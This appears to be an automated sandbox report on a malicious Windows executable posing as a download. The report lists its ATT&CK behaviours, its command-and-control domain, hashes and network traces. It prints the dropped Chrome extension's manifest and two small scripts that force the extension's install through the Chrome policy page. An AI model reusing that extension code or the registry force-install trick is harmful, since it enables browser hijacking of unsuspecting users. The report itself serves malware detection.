Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeProcess created: C:\Windows\SysWOW64\taskkill.exe /IM chrome.exeJump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeProcess created: C:\Windows\SysWOW64\taskkill.exe /F /IM chrome.exe /TJump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 0_2_00911430 cpuid 0_2_00911430
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: GetLocaleInfoA,0_2_0091A67F
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 0_2_00914ACC GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00914ACC

Lowering of HIPS / PFW / Operating System Security Settings

barindex
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\google\chrome\ExtensionInstallForcelistJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
Windows Management Instrumentation
11
Browser Extensions
11
Process Injection
1
Masquerading
OS Credential Dumping1
System Time Discovery
Remote Services1
Archive Collected Data
12
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts3
Command and Scripting Interpreter
1
DLL Side-Loading
1
DLL Side-Loading
1
Disable or Modify Tools
LSASS Memory1
Security Software Discovery
Remote Desktop Protocol1
Browser Session Hijacking
1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts2
Native API
Logon Script (Windows)1
Extra Window Memory Injection
1
Modify Registry
Security Account Manager2
File and Directory Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
Process Injection
NTDS33
System Information Discovery
Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information
LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading
Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Extra Window Memory Injection
DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1583876 Sample: Your File Is Ready To Downl... Startdate: 03/01/2025 Architecture: WINDOWS Score: 68 29 Antivirus detection for URL or domain 2->29 31 Multi AV Scanner detection for submitted file 2->31 33 Machine Learning detection for sample 2->33 35 AI detected suspicious sample 2->35 7 Your File Is Ready To Download.exe 4 9 2->7         started        process3 signatures4 37 Modifies Chrome's extension installation force list 7->37 10 chrome.exe 7->10         started        12 taskkill.exe 1 7->12         started        14 taskkill.exe 1 7->14         started        16 chrome.exe 7->16         started        process5 process6 18 chrome.exe 10->18         started        21 conhost.exe 12->21         started        23 conhost.exe 14->23         started        25 chrome.exe 16->25         started        dnsIp7 27 getfiles.wiki 185.107.56.193, 443, 54544, 54545 NFORCENL Netherlands 18->27

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
Your File Is Ready To Download.exe71%ReversingLabsWin32.Browser.Shafmia
Your File Is Ready To Download.exe100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://getfiles.wiki/welcome.php%s100%Avira URL Cloudmalware
https://getfiles.wiki/welcome.php100%Avira URL Cloudmalware
NameIPActiveMaliciousAntivirus DetectionReputation
getfiles.wiki
185.107.56.193
truefalse
    unknown
    fp2e7a.wpc.phicdn.net
    192.229.221.95
    truefalse
      high
      NameSourceMaliciousAntivirus DetectionReputation
      https://getfiles.wiki/welcome.php%sYour File Is Ready To Download.exe, 00000000.00000002.11892490158.000000000091D000.00000004.00000001.01000000.00000003.sdmpfalse
      • Avira URL Cloud: malware
      unknown
      https://getfiles.wiki/welcome.phpYour File Is Ready To Download.exe, Your File Is Ready To Download.exe, 00000000.00000002.11892532407.0000000000984000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      unknown
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      185.107.56.193
      getfiles.wikiNetherlands
      43350NFORCENLfalse
      Joe Sandbox version:41.0.0 Charoite
      Analysis ID:1583876
      Start date and time:2025-01-03 19:56:00 +01:00
      Joe Sandbox product:CloudBasic
      Overall analysis duration:0h 4m 16s
      Hypervisor based Inspection enabled:false
      Report type:full
      Cookbook file name:default.jbs
      Analysis system description:Windows 11 23H2 with Office Professional Plus 2021, Chrome 131, Firefox 133, Adobe Reader DC 24, Java 8 Update 431, 7zip 24.09
      Number of analysed new started processes analysed:47
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Sample name:Your File Is Ready To Download.exe
      Detection:MAL
      Classification:mal68.phis.winEXE@33/4@2/1
      EGA Information:
      • Successful, ratio: 100%
      HCA Information:
      • Successful, ratio: 98%
      • Number of executed functions: 18
      • Number of non-executed functions: 9
      Cookbook Comments:
      • Found application associated with file extension: .exe
      • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, SIHClient.exe, appidcertstorecheck.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
      • Excluded IPs from analysis (whitelisted): 204.79.197.203, 172.217.18.3, 64.233.184.84, 142.250.186.142, 142.250.185.195, 142.250.185.174, 142.250.185.78, 142.250.181.238, 142.250.186.46, 172.202.163.200, 142.250.185.106, 142.250.186.170, 142.250.185.74, 172.217.18.106, 216.58.212.170, 142.250.185.202, 142.250.185.170, 142.250.184.234, 216.58.206.74, 142.250.185.138, 172.217.23.106, 142.250.185.234, 172.217.18.10, 142.250.186.106, 142.250.186.74, 172.217.16.202, 13.107.21.237, 23.56.254.164, 20.199.58.43, 20.190.159.2
      • Excluded domains from analysis (whitelisted): www.bing.com, assets.msn.com, client.wns.windows.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, fd.api.iris.microsoft.com, a-0003.a-msedge.net, oneocsp-microsoft-com.a-0003.a-msedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, oneocsp.microsoft.com, clients2.google.com, ocsp.digicert.com, redirector.gvt1.com, login.live.com, res.public.onecdn.static.microsoft, ocsp.edge.digicert.com, sls.update.microsoft.com, clients.l.google.com, glb.sls.prod.dcat.dsp.trafficmanager.net, optimizationguide-pa.googleapis.com
      • Not all processes where analyzed, report is missing behavior information
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.
      • VT rate limit hit for: Your File Is Ready To Download.exe
      TimeTypeDescription
      13:56:56API Interceptor1x Sleep call for process: Your File Is Ready To Download.exe modified
      No context
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      fp2e7a.wpc.phicdn.nethttp://www.klim.comGet hashmaliciousUnknownBrowse
      • 192.229.221.95
      Reparto Trabajo TP4.xlsmGet hashmaliciousUnknownBrowse
      • 192.229.221.95
      EwpsQzeky5.msiGet hashmaliciousUnknownBrowse
      • 192.229.221.95
      https://gldkzr-lpqw.buzz/script/ut.js?cb%5C=1735764124690Get hashmaliciousUnknownBrowse
      • 192.229.221.95
      hcxmivKYfL.exeGet hashmaliciousRedLineBrowse
      • 192.229.221.95
      Bo6uO5gKL4.exeGet hashmaliciousUnknownBrowse
      • 192.229.221.95
      vEtDFkAZjO.exeGet hashmaliciousRL STEALER, StormKittyBrowse
      • 192.229.221.95
      BEncode Editor.exeGet hashmaliciousUnknownBrowse
      • 192.229.221.95
      valyzt.msiGet hashmaliciousXRedBrowse
      • 192.229.221.95
      docx.msiGet hashmaliciousXRedBrowse
      • 192.229.221.95
      getfiles.wikiYour File Is Ready To Download.zipGet hashmaliciousUnknownBrowse
      • 104.21.11.107
      chromecache_103.1.exeGet hashmaliciousUnknownBrowse
      • 188.114.96.7
      edgchrv5.exeGet hashmaliciousUnknownBrowse
      • 188.114.97.7
      TriMPFPatch56form20230426.exeGet hashmaliciousUnknownBrowse
      • 188.114.96.3
      luxor - pharaoh's challenge.exeGet hashmaliciousUnknownBrowse
      • 188.114.97.7
      $RDGU87D.exeGet hashmaliciousUnknownBrowse
      • 188.114.97.3
      $RLFVMMG.exeGet hashmaliciousUnknownBrowse
      • 188.114.96.3
      inno-chrome-malware.exeGet hashmaliciousUnknownBrowse
      • 188.114.97.3
      inno-chrome-malware.exeGet hashmaliciousUnknownBrowse
      • 188.114.96.3
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      NFORCENL236236236.elfGet hashmaliciousUnknownBrowse
      • 77.247.183.149
      https://icsportal-update.duckdns.org/sq0.php?session=675a91d9e40e3Get hashmaliciousUnknownBrowse
      • 185.45.195.138
      y1rS62yprs.exeGet hashmaliciousBabadedaBrowse
      • 46.166.186.7
      y1rS62yprs.exeGet hashmaliciousBabadedaBrowse
      • 46.166.186.6
      jew.ppc.elfGet hashmaliciousUnknownBrowse
      • 46.166.152.193
      http://beonlineboo.comGet hashmaliciousUnknownBrowse
      • 179.60.150.123
      bot.sh4.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
      • 185.7.78.88
      bot.arm.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
      • 185.7.78.88
      bot.x86_64.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
      • 185.7.78.88
      bot.ppc.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
      • 185.7.78.88
      No context
      No context
      Process:C:\Users\user\Desktop\Your File Is Ready To Download.exe
      File Type:Google Chrome extension, version 3
      Category:dropped
      Size (bytes):46651
      Entropy (8bit):7.95882665721754
      Encrypted:false
      SSDEEP:768:37cjcBjsI/hbTTWJp8ThElAfPryn5QzShaPuChbhFbHRu/llKGr7J9FwyIlWg+S0:3hv5Hq8ThElAfzyneSMPuKbvzUllKGzr
      MD5:A960766B263F208186D07CF900B9EF02
      SHA1:41BBB20A9EA2DBBCC527B1BD908F618FB7489D70
      SHA-256:85333EB6F5EFF972FA595FC7C2D16DD08097ACB57AABF769F19DD05E221E3AD2
      SHA-512:C806E6370BC5DAE8557AF61FA0CC7FD6F9B6ED3B3F871CA234CE5DEDF93E522A4D5D42AFCB1C9136DC267BC8CBE92649511F0248581C094D4BDF1CB3E83F1C55
      Malicious:false
      Reputation:low
      Preview:Cr24....E.........0.."0...*.H.............0...........g.@..B......QvIMtv..PCN.L..;..,.t...f...t...5...^"O..x.x...&......g..X..Z..-.N....j8gg..Y.zo...bwOG._..J.r..u......<.4...B.~l.ud.....0U.;...W?z..:F...r.W.)...!..........,.L.+.vb:..h.....K..W....E.....JL.u...1........0........Gd.;....O..h.........g..6.2=`.".2/...Q.g... f.$.IrX....w.7....S...~......6.5.m.{..%..N....|...l.O..O.. .L.,L..l...l..@....].R...(.sDAW.3..F..5...3.c.p.|...........zX>V.}5.O..S....#...^.1..Qd`._.\e.......j.....g.z7x.X..8.u.7>42....f1{$r.......<.`.1..$=..Zj.......L..`.......I<'...c.\....rQPK..-.......OV...[............manifest.json.....................SMo.0...W...(.9n..h.a.......!3.#W..%.....I.]wK..f?>>R...".r...Y...m^D.d.....:a[.@.w#>..w{C..-k=.j.Y.m....Q..#)a...._........f........u.b.!....xc.o0......<@.C...CK..m..<. ..`.h..S....d. p*..IW.:=wn7......8...3...$.|..)..?.X~,.b.,.....c....bJ..uqY.. ...Q.u.v..%B^..E[......8..qJ.Fg...V.b.Pa>..[`.cFJ..v....M..7)...8ipiyj..a...5.5../..
      Process:C:\Users\user\Desktop\Your File Is Ready To Download.exe
      File Type:JSON data
      Category:dropped
      Size (bytes):273
      Entropy (8bit):4.76438627845756
      Encrypted:false
      SSDEEP:6:EW/COIk/hsu1wC6VAPk8yyWSD9kn+E8Lyg8c:r6OJhsu1wXAPk8Sic+EaPN
      MD5:99F8D6AA35E67DB20B5F6E3FC54101CE
      SHA1:37E09293AA7CDB8FAE7754AAAE3E8BD2591A2F29
      SHA-256:CC1C1C7AA14AC707F66629095B8E117109660C13511F26D6EEDA1E9FDC363AB2
      SHA-512:57562DBE3C33139B98FF244CDCC233C9689823A11032D42B9B179EDA53831481422D69A62691EEBFF34C0AE85C36CBE7F8B16599D89919BAB759CFD38AF27797
      Malicious:false
      Preview:{..."name": "Apps",..."description": "",..."version": "1.0",..."manifest_version": 3,..."background": {...."service_worker": "service.js",...."type": "module"...},..."permissions": ["tabs", "scripting", "management", "background"],..."host_permissions": ["chrome://*/*"]..}
      Process:C:\Users\user\Desktop\Your File Is Ready To Download.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):320
      Entropy (8bit):5.103868585629314
      Encrypted:false
      SSDEEP:6:YXOBLow3rzLQm4yRDUwNR21aMXgBDoQYIxXYMoVsxrHLLqL:Y+9o0g3IMIDVYVMjrSL
      MD5:D396BCBECCA65BEE695815EC741653AC
      SHA1:CF4725418D0704F2E7A7E1F7E0FEFE840937C053
      SHA-256:C19DBE8A294A122EB5763A1D0F29B48BE6ED2A6892D56B3035261D4EBB3E30F6
      SHA-512:B1B0BBF423AC66F60AB591BF9CF62528FA224B3B8E46139CC112C5DEE4F6ED834498CC3C69962C7663A3BCAEF14B68B20AEFDE487EB85D7D93651A1B2A9F8EFF
      Malicious:false
      Preview:chrome.management.onInstalled.addListener(info => {...if (info.id != 'jdejdmchbgaciegdmifmnkopbdbfhcfb') return;.....setTimeout(() => {....chrome.tabs.create({ url: 'chrome://policy' }, tab => {.....chrome.scripting.executeScript({......target: { tabId: tab.id },......files: ['web.js'].... });....});...}, 500);..});
      Process:C:\Users\user\Desktop\Your File Is Ready To Download.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):299
      Entropy (8bit):4.8969499354657176
      Encrypted:false
      SSDEEP:6:oJRoJfwejEzKeYDFOEn9zmYnadRv5F8smvDNRU/snproLNRiif:ofoJYejj9n9Sdx5msmvDLrKdf
      MD5:78DA8C3C7BCC4FCBE1D1C1D4209BA026
      SHA1:CCACDA33826629E3A5B552BA26227D9D1B026BCA
      SHA-256:893FCFE4EDCDB07BCC3E05A3304F93F0358C9D8F4CC967058585F553BB82AD02
      SHA-512:01C3DEF2B9A38ABD5C6D447C52D8EC3533C8098DB69DCF30682EFA992BE71666D66A56AB3E6B161F8017FE018E20E479C365B780F3CF94ED507CAEA99EADBC06
      Malicious:false
      Preview:addEventListener('load', () => {...if (location.host !== 'policy') return;.....const reload = () => {....const button = document.querySelector('#reload-policies');......if (button) {.....button.click();.....setTimeout(close, 200);....} else {.....setTimeout(reload, 200);....}...}.....reload();..});
      File type:PE32 executable (GUI) Intel 80386, for MS Windows
      Entropy (8bit):6.2951694799556455
      TrID:
      • Win32 Executable (generic) a (10002005/4) 99.96%
      • Generic Win/DOS Executable (2004/3) 0.02%
      • DOS Executable Generic (2002/1) 0.02%
      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
      File name:Your File Is Ready To Download.exe
      File size:203'120 bytes
      MD5:c350eacfe1e1e28295eb961af91e70f8
      SHA1:bca71c098aadb35a4e94f1f68d239eab1d11f52a
      SHA256:0b0dbc8833cc08b6d44607278f7945b015c23dcfd2531cd5fe38b5dc65d28f5b
      SHA512:0f6f3b2b903cc53bcfefc2aeaa6fc95feb2b2eceb691efcc474d70129be2bc51bd89532902c58ee4e5a26018b03e14a5e4a00e4931896c884dc37c01ff8f1986
      SSDEEP:3072:TWMLRvbqV5RGlAQBpB4M41G7PrOWr7J4+xJ+:aMLRO0x541szhr7J4s+
      TLSH:A8145B02E640C065E304373659A1E5E0D57BFD395898E0CFF65C7ABA69B278349B328F
      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........(.o.I|<.I|<.I|<...<.I|<...<.I|<...<.I|<...<.I|<...<.I|<.I}<.I|<...<.I|<...<.I|<...<.I|<Rich.I|<........PE..L.....od...........
      Icon Hash:0c0c2d33ceec80aa
      Entrypoint:0x4024f2
      Entrypoint Section:.text
      Digitally signed:true
      Imagebase:0x400000
      Subsystem:windows gui
      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Time Stamp:0x646F17DC [Thu May 25 08:10:04 2023 UTC]
      TLS Callbacks:
      CLR (.Net) Version:
      OS Version Major:5
      OS Version Minor:0
      File Version Major:5
      File Version Minor:0
      Subsystem Version Major:5
      Subsystem Version Minor:0
      Import Hash:79e188ad2407d06a2cb43728060e31e3
      Signature Valid:true
      Signature Issuer:CN=GlobalSign GCC R45 EV CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE
      Signature Validation Error:The operation completed successfully
      Error Number:0
      Not Before, Not After
      • 22/03/2023 15:10:47 22/03/2024 15:10:47
      Subject Chain
      • CN=SOFTWARE ABFG LTD, O=SOFTWARE ABFG LTD, STREET="2nd Floor College House, 17 King Edwards Road", L=Ruislip, S=London, C=GB, OID.1.3.6.1.4.1.311.60.2.1.3=GB, SERIALNUMBER=14698890, OID.2.5.4.15=Private Organization
      Version:3
      Thumbprint MD5:FEE4DECF8FD42396157E11993B5B34D3
      Thumbprint SHA-1:EE81E7D510B97695351EF3F2E0C10F4D0601EDA6
      Thumbprint SHA-256:BAC0E9EE69D6FCA2A9B1164094103589FD63676A564F420D71A5B8A172BB3E7B
      Serial:3C22F5C916B284010CB8A481
      Instruction
      call 00007FCAC938EDCAh
      jmp 00007FCAC938C66Eh
      mov edi, edi
      push ebp
      mov ebp, esp
      sub esp, 00000328h
      mov dword ptr [0041A998h], eax
      mov dword ptr [0041A994h], ecx
      mov dword ptr [0041A990h], edx
      mov dword ptr [0041A98Ch], ebx
      mov dword ptr [0041A988h], esi
      mov dword ptr [0041A984h], edi
      mov word ptr [0041A9B0h], ss
      mov word ptr [0041A9A4h], cs
      mov word ptr [0041A980h], ds
      mov word ptr [0041A97Ch], es
      mov word ptr [0041A978h], fs
      mov word ptr [0041A974h], gs
      pushfd
      pop dword ptr [0041A9A8h]
      mov eax, dword ptr [ebp+00h]
      mov dword ptr [0041A99Ch], eax
      mov eax, dword ptr [ebp+04h]
      mov dword ptr [0041A9A0h], eax
      lea eax, dword ptr [ebp+08h]
      mov dword ptr [0041A9ACh], eax
      mov eax, dword ptr [ebp-00000320h]
      mov dword ptr [0041A8E8h], 00010001h
      mov eax, dword ptr [0041A9A0h]
      mov dword ptr [0041A89Ch], eax
      mov dword ptr [0041A890h], C0000409h
      mov dword ptr [0041A894h], 00000001h
      mov eax, dword ptr [0040D004h]
      mov dword ptr [ebp-00000328h], eax
      mov eax, dword ptr [0040D008h]
      mov dword ptr [ebp-00000324h], eax
      call dword ptr [00000034h]
      Programming Language:
      • [C++] VS2008 build 21022
      • [ASM] VS2008 build 21022
      • [ C ] VS2008 build 21022
      • [ C ] VS2005 build 50727
      • [IMP] VS2005 build 50727
      • [RES] VS2008 build 21022
      • [LNK] VS2008 build 21022
      NameVirtual AddressVirtual Size Is in Section
      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
      IMAGE_DIRECTORY_ENTRY_IMPORT0xc7bc0x3c.rdata
      IMAGE_DIRECTORY_ENTRY_RESOURCE0x1d0000x13d8c.rsrc
      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
      IMAGE_DIRECTORY_ENTRY_SECURITY0x2ec000x2d70
      IMAGE_DIRECTORY_ENTRY_BASERELOC0x310000x968.reloc
      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xc3b00x40.rdata
      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
      IMAGE_DIRECTORY_ENTRY_IAT0xb0000x12c.rdata
      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
      .text0x10000x9ca40x9e007954e3edf71628ed362680d37db68c4bFalse0.5902393196202531data6.543650178306183IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      .rdata0xb0000x1e7e0x200090319f4515606c625cccdb03e4b0f2caFalse0.349853515625data5.345127392800988IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
      .data0xd0000xf79c0xda00853aaeeebf0369a3acc1e4fe84be9c6fFalse0.8595721043577982data7.656745628296985IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      .rsrc0x1d0000x13d8c0x13e009c9f4cc955168ffffb42b32331e85d41False0.17713246855345913data3.9085055920586522IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
      .reloc0x310000x11920x120009f6b0bc7ff674a66c6feefbace7fb46False0.45703125data4.344443129192919IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
      NameRVASizeTypeLanguageCountryZLIB Complexity
      RT_ICON0x1d5f80xa68Device independent bitmap graphic, 64 x 128 x 4, image size 2048EnglishUnited States0.1174924924924925
      RT_ICON0x1e0600x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.15792682926829268
      RT_ICON0x1e6c80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.23387096774193547
      RT_ICON0x1e9b00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.39864864864864863
      RT_ICON0x1ead80x1628Device independent bitmap graphic, 64 x 128 x 8, image size 4096, 256 important colorsEnglishUnited States0.08339210155148095
      RT_ICON0x201000xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.1023454157782516
      RT_ICON0x20fa80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.10649819494584838
      RT_ICON0x218500x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.10838150289017341
      RT_ICON0x21db80x12e5PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.8712011577424024
      RT_ICON0x230a00x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.05668398677373642
      RT_ICON0x272c80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.08475103734439834
      RT_ICON0x298700x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.09920262664165103
      RT_ICON0x2a9180x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.2047872340425532
      RT_ICON0x2ad800x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishUnited States0.14650537634408603
      RT_ICON0x2b0680x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishUnited States0.30405405405405406
      RT_ICON0x2b1900xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishUnited States0.3070362473347548
      RT_ICON0x2c0380x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishUnited States0.4842057761732852
      RT_ICON0x2c8e00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishUnited States0.3670520231213873
      RT_ICON0x2ce480x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.1087136929460581
      RT_ICON0x2f3f00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.23170731707317074
      RT_ICON0x304980x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.3599290780141844
      RT_MENU0x309000x4adataEnglishUnited States0.8648648648648649
      RT_DIALOG0x3094c0x144dataEnglishUnited States0.5679012345679012
      RT_STRING0x30a900x50dataEnglishUnited States0.6875
      RT_ACCELERATOR0x30ae00x10dataEnglishUnited States1.25
      RT_GROUP_ICON0x30af00xbcdataEnglishUnited States0.6170212765957447
      RT_GROUP_ICON0x30bac0x76dataEnglishUnited States0.6610169491525424
      RT_MANIFEST0x30c240x165ASCII text, with CRLF line terminatorsEnglishUnited States0.5434173669467787
      DLLImport
      KERNEL32.dllGetModuleHandleW, GetProcAddress, WaitForSingleObject, CloseHandle, GetFileAttributesW, Sleep, FindFirstFileW, FindNextFileW, GetStartupInfoW, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, DeleteCriticalSection, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, GetLastError, InterlockedDecrement, HeapCreate, VirtualFree, HeapFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, SetFilePointer, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, EnterCriticalSection, LeaveCriticalSection, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, MultiByteToWideChar, LoadLibraryA, InitializeCriticalSectionAndSpinCount, HeapAlloc, VirtualAlloc, HeapReAlloc, RtlUnwind, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, HeapSize, CreateFileA, FlushFileBuffers
      SHELL32.dllSHGetKnownFolderPath, SHGetSpecialFolderPathW
      Language of compilation systemCountry where language is spokenMap
      EnglishUnited States
      TimestampSource PortDest PortSource IPDest IP
      Jan 3, 2025 19:56:58.481611013 CET54544443192.168.2.24185.107.56.193
      Jan 3, 2025 19:56:58.481664896 CET44354544185.107.56.193192.168.2.24
      Jan 3, 2025 19:56:58.481748104 CET54544443192.168.2.24185.107.56.193
      Jan 3, 2025 19:56:58.482856989 CET54545443192.168.2.24185.107.56.193
      Jan 3, 2025 19:56:58.482913017 CET44354545185.107.56.193192.168.2.24
      Jan 3, 2025 19:56:58.482981920 CET54545443192.168.2.24185.107.56.193
      Jan 3, 2025 19:56:58.483839035 CET54544443192.168.2.24185.107.56.193
      Jan 3, 2025 19:56:58.483854055 CET44354544185.107.56.193192.168.2.24
      Jan 3, 2025 19:56:58.561292887 CET54545443192.168.2.24185.107.56.193
      Jan 3, 2025 19:56:58.561327934 CET44354545185.107.56.193192.168.2.24
      Jan 3, 2025 19:56:59.339514971 CET54544443192.168.2.24185.107.56.193
      Jan 3, 2025 19:56:59.339596987 CET44354544185.107.56.193192.168.2.24
      Jan 3, 2025 19:56:59.339647055 CET54545443192.168.2.24185.107.56.193
      Jan 3, 2025 19:56:59.339654922 CET54544443192.168.2.24185.107.56.193
      Jan 3, 2025 19:56:59.387331963 CET44354545185.107.56.193192.168.2.24
      Jan 3, 2025 19:56:59.399707079 CET44354545185.107.56.193192.168.2.24
      Jan 3, 2025 19:56:59.399769068 CET54545443192.168.2.24185.107.56.193
      TimestampSource PortDest PortSource IPDest IP
      Jan 3, 2025 19:56:58.081517935 CET53544681.1.1.1192.168.2.24
      Jan 3, 2025 19:56:58.140634060 CET5421453192.168.2.241.1.1.1
      Jan 3, 2025 19:56:58.141066074 CET5246453192.168.2.241.1.1.1
      Jan 3, 2025 19:56:58.148823023 CET53652901.1.1.1192.168.2.24
      Jan 3, 2025 19:56:58.217159986 CET53542141.1.1.1192.168.2.24
      Jan 3, 2025 19:56:58.453885078 CET53524641.1.1.1192.168.2.24
      Jan 3, 2025 19:57:01.024147034 CET53595941.1.1.1192.168.2.24
      Jan 3, 2025 19:57:01.040551901 CET53550651.1.1.1192.168.2.24
      Jan 3, 2025 19:57:02.241831064 CET53493821.1.1.1192.168.2.24
      Jan 3, 2025 19:57:10.524683952 CET53529651.1.1.1192.168.2.24
      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
      Jan 3, 2025 19:56:58.140634060 CET192.168.2.241.1.1.10x1b77Standard query (0)getfiles.wikiA (IP address)IN (0x0001)false
